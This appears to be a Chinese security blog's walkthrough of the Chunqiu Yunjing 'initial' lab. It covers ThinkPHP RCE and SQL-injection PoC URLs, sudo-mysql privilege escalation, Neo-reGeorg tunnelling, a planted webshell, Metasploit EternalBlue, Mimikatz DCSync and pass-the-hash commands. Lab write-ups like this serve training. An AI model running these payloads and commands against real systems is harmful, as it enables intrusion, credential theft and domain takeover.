

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="rgba(71, 46, 98, 0.8)">
  <meta name="author" content="kyrie711-wq">
  <meta name="keywords" content="博客,技术,笔记">
  
    <meta name="description" content="内网渗透–春秋云镜initial一，前置知识前置知识包括三个部分thinkphp,内网穿透，永恒之蓝1.thinkphp漏洞原理thinkphp 2.xThinkPHP 2.x 远程代码执行漏洞（CVE-2014-9784）的原理主要涉及框架对用户输入的动态路由处理机制未进行严格过滤，导致攻击者可通过构造特定 URL 执行任意 PHP 代码 使用preg_replace的&#x2F;e模式匹配路由： $re">
<meta property="og:type" content="article">
<meta property="og:title" content="内网渗透--春秋云镜initial">
<meta property="og:url" content="https://kyrie711-wq.github.io/2025/03/18/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F--%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9Cinitial/index.html">
<meta property="og:site_name" content="我的博客">
<meta property="og:description" content="内网渗透–春秋云镜initial一，前置知识前置知识包括三个部分thinkphp,内网穿透，永恒之蓝1.thinkphp漏洞原理thinkphp 2.xThinkPHP 2.x 远程代码执行漏洞（CVE-2014-9784）的原理主要涉及框架对用户输入的动态路由处理机制未进行严格过滤，导致攻击者可通过构造特定 URL 执行任意 PHP 代码 使用preg_replace的&#x2F;e模式匹配路由： $re">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://kyrie711-wq.github.io/img/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202025-03-18%20205826.png">
<meta property="article:published_time" content="2025-03-17T16:00:00.000Z">
<meta property="article:modified_time" content="2025-08-23T08:32:24.759Z">
<meta property="article:author" content="kyrie711-wq">
<meta property="article:tag" content="内网渗透">
<meta property="article:tag" content="域渗透">
<meta property="article:tag" content="横向移动">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://kyrie711-wq.github.io/img/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202025-03-18%20205826.png">
  
  
  
  <title>内网渗透--春秋云镜initial - 我的博客</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  



  
<link rel="stylesheet" href="/css/custom.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"kyrie711-wq.github.io","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>我的博客</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>Home</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>Archives</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/%E5%AE%89%E5%85%A8%E9%A1%B9%E7%9B%AE/" target="_self">
                <i class="iconfont icon-app"></i>
                <span>安全项目</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/" target="_self">
                <i class="iconfont icon-bug-fill"></i>
                <span>漏洞挖掘</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/CTF%E7%AB%9E%E8%B5%9B/" target="_self">
                <i class="iconfont icon-flag-fill"></i>
                <span>CTF竞赛</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/Web%E6%B8%97%E9%80%8F/" target="_self">
                <i class="iconfont icon-windows-fill"></i>
                <span>Web渗透</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>Tags</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>About</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/vdysjx.webp') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="内网渗透--春秋云镜initial"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-03-18 00:00" pubdate>
          March 18, 2025 am
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          1.2k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          11 mins
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">内网渗透--春秋云镜initial</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="内网渗透–春秋云镜initial"><a href="#内网渗透–春秋云镜initial" class="headerlink" title="内网渗透–春秋云镜initial"></a>内网渗透–春秋云镜initial</h1><h2 id="一，前置知识"><a href="#一，前置知识" class="headerlink" title="一，前置知识"></a>一，前置知识</h2><h3 id="前置知识包括三个部分thinkphp-内网穿透，永恒之蓝"><a href="#前置知识包括三个部分thinkphp-内网穿透，永恒之蓝" class="headerlink" title="前置知识包括三个部分thinkphp,内网穿透，永恒之蓝"></a>前置知识包括三个部分thinkphp,内网穿透，永恒之蓝</h3><h4 id="1-thinkphp漏洞原理"><a href="#1-thinkphp漏洞原理" class="headerlink" title="1.thinkphp漏洞原理"></a>1.thinkphp漏洞原理</h4><h5 id="thinkphp-2-x"><a href="#thinkphp-2-x" class="headerlink" title="thinkphp 2.x"></a>thinkphp 2.x</h5><p>ThinkPHP 2.x 远程代码执行漏洞（CVE-2014-9784）的原理主要涉及框架对用户输入的动态路由处理机制未进行严格过滤，导致攻击者可通过构造特定 URL 执行任意 PHP 代码</p>
<p>使用<code>preg_replace</code>的<code>/e</code>模式匹配路由：</p>
<p><code>$res = preg_replace(&#39;@(\w+)&#39;.$depr.&#39;([^&#39;.$depr.&#39;\/]+)@e&#39;, &#39;$var[\&#39;\\1\&#39;]=&quot;\\2&quot;;&#39;, implode($depr,$paths));</code></p>
<p>导致用户的输入参数被插入双引号中执行，造成任意代码执行漏洞。</p>
<p>例如执行的poc url:</p>
<p><code>http://ip:8080//index.php? s=/index/index/xxx/$&#123;system(id)&#125;</code></p>
<h5 id="ThinkPHP5-SQL注入漏洞-敏感信息泄露"><a href="#ThinkPHP5-SQL注入漏洞-敏感信息泄露" class="headerlink" title="ThinkPHP5 SQL注入漏洞 &amp;&amp; 敏感信息泄露"></a>ThinkPHP5 SQL注入漏洞 &amp;&amp; 敏感信息泄露</h5><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-keyword">namespace</span> <span class="hljs-title class_">app</span>\<span class="hljs-title class_">index</span>\<span class="hljs-title class_">controller</span>;<br><br><span class="hljs-keyword">use</span> <span class="hljs-title">app</span>\<span class="hljs-title">index</span>\<span class="hljs-title">model</span>\<span class="hljs-title">User</span>;<br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Index</span></span><br><span class="hljs-class"></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">index</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-variable">$ids</span> = <span class="hljs-title function_ invoke__">input</span>(<span class="hljs-string">&#x27;ids/a&#x27;</span>);<br>        <span class="hljs-variable">$t</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">User</span>();<br>        <span class="hljs-variable">$result</span> = <span class="hljs-variable">$t</span>-&gt;<span class="hljs-title function_ invoke__">where</span>(<span class="hljs-string">&#x27;id&#x27;</span>, <span class="hljs-string">&#x27;in&#x27;</span>, <span class="hljs-variable">$ids</span>)-&gt;<span class="hljs-title function_ invoke__">select</span>();<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>代码使用 <code>input(&#39;ids/a&#39;)</code> 来接收用户输入，此方式未对输入进行严格过滤与验证，攻击者可能会通过构造恶意输入实施 SQL 注入攻击。比如，攻击者可传入包含恶意 SQL 语句的 <code>ids</code> 参数，借此绕过正常的查询逻辑。</p>
<p>例如： <code>http://192.168.18.181/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1</code></p>
<p> 数组的键名（<code>0,updatexml(...)</code>）被直接拼接到 SQL 查询中，导致 SQL 注入。</p>
<p>即<code>SELECT * FROM user WHERE id IN (0,updatexml(0,concat(0xa,user()),0))</code></p>
<h5 id="ThinkPHP-5-0-23-远程代码执行漏洞"><a href="#ThinkPHP-5-0-23-远程代码执行漏洞" class="headerlink" title="ThinkPHP 5.0.23 远程代码执行漏洞"></a>ThinkPHP 5.0.23 远程代码执行漏洞</h5><p>其5.0.23以前的版本中，获取method的方法中没有正确处理方法名，导致攻击者可以调用Request类任意方法并构造利用链，从而导致远程代码执行漏洞。</p>
<p>poc url:</p>
<p><code>http://example.com/index.php?s=captcha&amp;method=__construct&amp;filter[]=system&amp;method=get&amp;server[REQUEST_METHOD]=id</code></p>
<h4 id="2，内网穿透"><a href="#2，内网穿透" class="headerlink" title="2，内网穿透"></a>2，内网穿透</h4><h5 id="攻击思路"><a href="#攻击思路" class="headerlink" title="攻击思路"></a>攻击思路</h5><p>攻击外网服务器，获取外网服务器的权限，接着利用入侵成功的外网服务器作为跳板，攻击内网其他服务器，最后获得敏感数据，并将数据传递到攻击者，看情况安装长期后门，实现长期控制和获得敏感数据的方式</p>
<h5 id="攻击方法"><a href="#攻击方法" class="headerlink" title="攻击方法"></a>攻击方法</h5><p><strong>frp中转代理</strong></p>
<p><strong>服务端（frps）</strong>：部署在公网服务器，监听指定端口，负责接收外部请求并转发到内网。</p>
<p><strong>客户端（frpc）</strong>：运行在内网设备，与服务端建立长连接，将内网服务映射到公网。</p>
<p><strong>Neo-reGeorg</strong>脚本监听</p>
<p><strong>服务端</strong>：部署在目标服务器的 Webshell 脚本（如<code>tunnel.php</code>、<code>tunnel.jsp</code>），负责接收 HTTP 请求并转发到内网目标。</p>
<p><strong>客户端</strong>：攻击机上运行的 Python 脚本（如<code>reGeorgSocksProxy.py</code>），监听本地端口并将 SOCKS 请求通过 HTTP 协议发送到服务端。</p>
<h4 id="3-横向移动与域渗透"><a href="#3-横向移动与域渗透" class="headerlink" title="3.横向移动与域渗透"></a>3.横向移动与域渗透</h4><p><strong>横向移动</strong>：在内网中从已控制的主机向其他未授权主机扩展权限的过程，核心目标是获取更多资源访问权限。</p>
<p>通常采用哈希传递的方法是实现横向移动：</p>
<p>在 Windows 系统中，用户密码通常以哈希值的形式存储，而攻击者可以直接传递这个哈希值来完成认证，绕过传统的口令验证。</p>
<p>哈希传递（PTH）：使用<code>crackmapexec</code>结合 NTLM 哈希远程执行命令。</p>
<p><strong>域渗透</strong>：针对 Windows 域环境的攻击，目标是控制域控制器（DC）并获取域内所有资源权限。</p>
<p>域控攻击</p>
<ul>
<li><p><strong>DCSync 攻击</strong>：利用 Mimikatz 导出域内用户哈希。</p>
</li>
<li><p><strong>黄金票据（Golden Ticket）</strong>：伪造 Kerberos TGT 票据，长期控制域。</p>
</li>
</ul>
<h2 id="二，复现过程"><a href="#二，复现过程" class="headerlink" title="二，复现过程"></a>二，复现过程</h2><p>利用集成攻击工具然后getshell</p>
<p>连接蚁剑终端，查看权限</p>
<p><img src="/img/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202025-03-18%20205826.png" srcset="/img/loading.gif" lazyload alt="蚁剑终端权限"></p>
<p>注意到&#x2F;usr&#x2F;bin&#x2F;mysql有root权限，我们可以采用mysql提权</p>
<p><code>sudo mysql -e &#39;\! cat /root/flag/f*&#39;</code></p>
<p><img src="/img/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202025-03-18%20205817.png" srcset="/img/loading.gif" lazyload alt="MySQL提权"></p>
<p>成功夺取flag01</p>
<p>随后进行信息收集，先用ifconfig查看内网IP</p>
<p><img src="https://fushuling-1309926051.cos.ap-shanghai.myqcloud.com/2023/08/5.png" srcset="/img/loading.gif" lazyload alt="内网IP信息"></p>
<p>上传fscan_amd扫描内网环境</p>
<p><img src="/img/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202025-03-18%20210116.png" srcset="/img/loading.gif" lazyload alt="扫描内网环境"></p>
<p>注意到内网中有三个ip:172.22.1.21存在永恒之蓝  172.22.1.18信呼系统  172.22.1.2   DC域控</p>
<p><strong>DC权限最高，在最后夺取域控的时候打，先打信呼</strong></p>
<h3 id="2，内网渗透"><a href="#2，内网渗透" class="headerlink" title="2，内网渗透"></a>2，内网渗透</h3><p>利用工具neo-regeorgs生成脚本并上传</p>
<p><code>python3 nenreg.py generate -k kali</code></p>
<p><img src="/img/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202025-03-18%20210400.png" srcset="/img/loading.gif" lazyload alt="生成脚本并上传"></p>
<p>设置socks5代理监听1080端口</p>
<p><code>python neoreg.py -k password -u http://39.98.171.149/tunnel.php</code></p>
<p><img src="/img/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202025-03-18%20210643.png" srcset="/img/loading.gif" lazyload alt="设置socks5代理"></p>
<p>在proxychains4设置socks5代理</p>
<p><img src="/img/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202025-03-18%20211858.png" srcset="/img/loading.gif" lazyload alt="设置socks5代理"></p>
<p>测试连接</p>
<p><img src="/img/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202025-03-18%20212117.png" srcset="/img/loading.gif" lazyload alt="测试连接"></p>
<p>连接成功</p>
<p>随后利用现成的poc打信呼，同时在同目录下放置一句话木马</p>
<p><img src="/img/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202025-03-18%20212946.png" srcset="/img/loading.gif" lazyload alt="利用poc打信呼"></p>
<p>通过回显的url连接蚁剑夺取flag02</p>
<p><img src="/img/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202025-03-18%20213328.png" srcset="/img/loading.gif" lazyload alt="夺取flag02"></p>
<h3 id="3-横向移动与域渗透-1"><a href="#3-横向移动与域渗透-1" class="headerlink" title="3.横向移动与域渗透"></a>3.横向移动与域渗透</h3><p>先打利用msf打永恒之蓝</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs bash">use exploit/windows/smb/ms17_010_eternalblue<br><span class="hljs-built_in">set</span> payload windows/x64/meterpreter/bind_tcp<br>show options <br><span class="hljs-built_in">set</span> rhosts 172.22.1.21<br>run<br></code></pre></td></tr></table></figure>

<p><img src="/img/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202025-03-18%20213439.png" srcset="/img/loading.gif" lazyload alt="打永恒之蓝"></p>
<p>开始横向，导出域控hash</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">load kiwi<br>kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv<br></code></pre></td></tr></table></figure>

<p><img src="/img/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202025-03-18%20213654.png" srcset="/img/loading.gif" lazyload alt="导出域控hash"></p>
<p>我们得到了最高权限密码</p>
<p>最后打hash传递</p>
<p><code>proxychains crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x &quot;type Users\Administrator\flag\flag03.txt&quot;</code></p>
<p><img src="/img/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202025-03-18%20214129.png" srcset="/img/loading.gif" lazyload alt="打hash传递"></p>
<p>用NTLM 哈希值以该用户身份登录系统，然后夺取整个域控，在主机中拿下flag</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/Web%E6%B8%97%E9%80%8F/" class="category-chain-item">Web渗透</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/" class="print-no-link">#内网渗透</a>
      
        <a href="/tags/%E5%9F%9F%E6%B8%97%E9%80%8F/" class="print-no-link">#域渗透</a>
      
        <a href="/tags/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/" class="print-no-link">#横向移动</a>
      
    </div>
  
</div>


              

              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/06/28/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F2-%E5%A4%9A%E7%BD%91%E6%AE%B5%E6%94%BB%E5%87%BB/" title="内网渗透2-多网段攻击">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">内网渗透2-多网段攻击</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/10/18/CTF%E7%AB%9E%E8%B5%9B%E6%A8%A1%E6%9D%BF/" title="CTF题目解析：【题目名称】">
                        <span class="hidden-mobile">CTF题目解析：【题目名称】</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>Table of Contents</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
